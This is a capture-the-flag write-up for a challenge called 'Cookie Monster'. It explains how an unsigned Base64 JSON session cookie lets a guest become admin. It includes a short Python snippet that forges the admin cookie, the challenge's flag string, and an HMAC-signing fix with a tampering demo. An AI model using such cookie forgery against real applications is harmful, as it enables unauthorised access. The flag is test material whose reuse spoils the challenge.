Cookie Monster — Privilege Escalation via Unsigned Role Claim

By webwyrm


Red Wire CTF 2025

Challenge: Cookie Monster

The session cookie carried an unverified role field the server trusted blindly. One request, admin access.

Setup

The challenge presents a login form. After you authenticate as guest, the app stores a Base64-encoded JSON cookie:

{"user": "guest", "role": "user"}

The Bug

The server decodes the cookie value but never validates an HMAC or signature. Changing role to admin, re-encoding, and sending the modified cookie grants full admin access.

import base64, json

# Same shape as the guest cookie, with only the role claim changed.
payload = {"user": "guest", "role": "admin"}
# Prints the Base64 cookie value to paste into the browser; the flag itself,
# CTFProf{c00k13_wr1t3up_s0urc3_r34d}, is what the admin panel returns afterwards.
print(base64.b64encode(json.dumps(payload).encode()).decode())

Set that as the cookie value and reload — the admin panel serves the flag.

Why It Works

Client-side trust in unverified claims is a classic broken access control. Always sign session data (and verify the signature before reading a single claim), or keep the session server-side and hand the client only an opaque identifier. cc @cipherlynx for flagging the pattern early.
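As an added example (not part of the writeup or the challenge's own code), the vulnerable decode beside an HMAC-signed version of the same Base64-JSON cookie format; the secret value and all function names are assumed for this example. tamper_role reproduces the writeup's role change so the two paths can be compared on the same input.

```python
import base64
import hashlib
import hmac
import json

# Assumed secret for this example only; a real deployment loads it from configuration.
SECRET = b"example-only-secret"

def encode_unsigned(claims: dict) -> str:
    """The challenge's cookie format: Base64 of a JSON object, nothing else."""
    return base64.b64encode(json.dumps(claims).encode()).decode()

def decode_unsigned(cookie: str) -> dict:
    """The vulnerable pattern: whatever JSON the client sent is the session."""
    return json.loads(base64.b64decode(cookie))

def encode_signed(claims: dict) -> str:
    """Hardened form: append an HMAC-SHA256 tag over the exact encoded bytes."""
    body = base64.b64encode(json.dumps(claims, sort_keys=True).encode())
    tag = hmac.new(SECRET, body, hashlib.sha256).hexdigest()
    return body.decode() + "." + tag

def decode_signed(cookie: str):
    """Return the claims only if the tag verifies; None means reject the session."""
    body, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison, so a wrong tag is not leaked byte by byte.
    if not hmac.compare_digest(expected, tag):
        return None
    return json.loads(base64.b64decode(body))

def tamper_role(cookie: str, role: str) -> str:
    """Re-encode the JSON body with a different role, keeping any existing tag
    (the writeup's one-request change, applied to either cookie format)."""
    body, sep, tag = cookie.rpartition(".")
    if not sep:
        body = cookie
    claims = json.loads(base64.b64decode(body))
    claims["role"] = role
    new_body = base64.b64encode(json.dumps(claims, sort_keys=True).encode()).decode()
    return new_body + "." + tag if sep else new_body

def demo():
    """Unsigned path accepts the changed role; signed path rejects the cookie."""
    guest = {"user": "guest", "role": "user"}
    escalated = decode_unsigned(tamper_role(encode_unsigned(guest), "admin"))
    rejected = decode_signed(tamper_role(encode_signed(guest), "admin"))
    return escalated["role"], rejected
```

A server using decode_signed treats None as "no session" and falls back to the login page, which is the check the challenge was missing.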

Comments


cipherlynx · Jun 1, 2026

Clean approach. The unsigned claim was right there the whole time. @forensicfox you'll recognise the same pattern in Memory Lane.

packetmage · Jun 1, 2026

Would love a follow-up covering Header Smuggler — it abuses a similar proxy trust model on a different layer.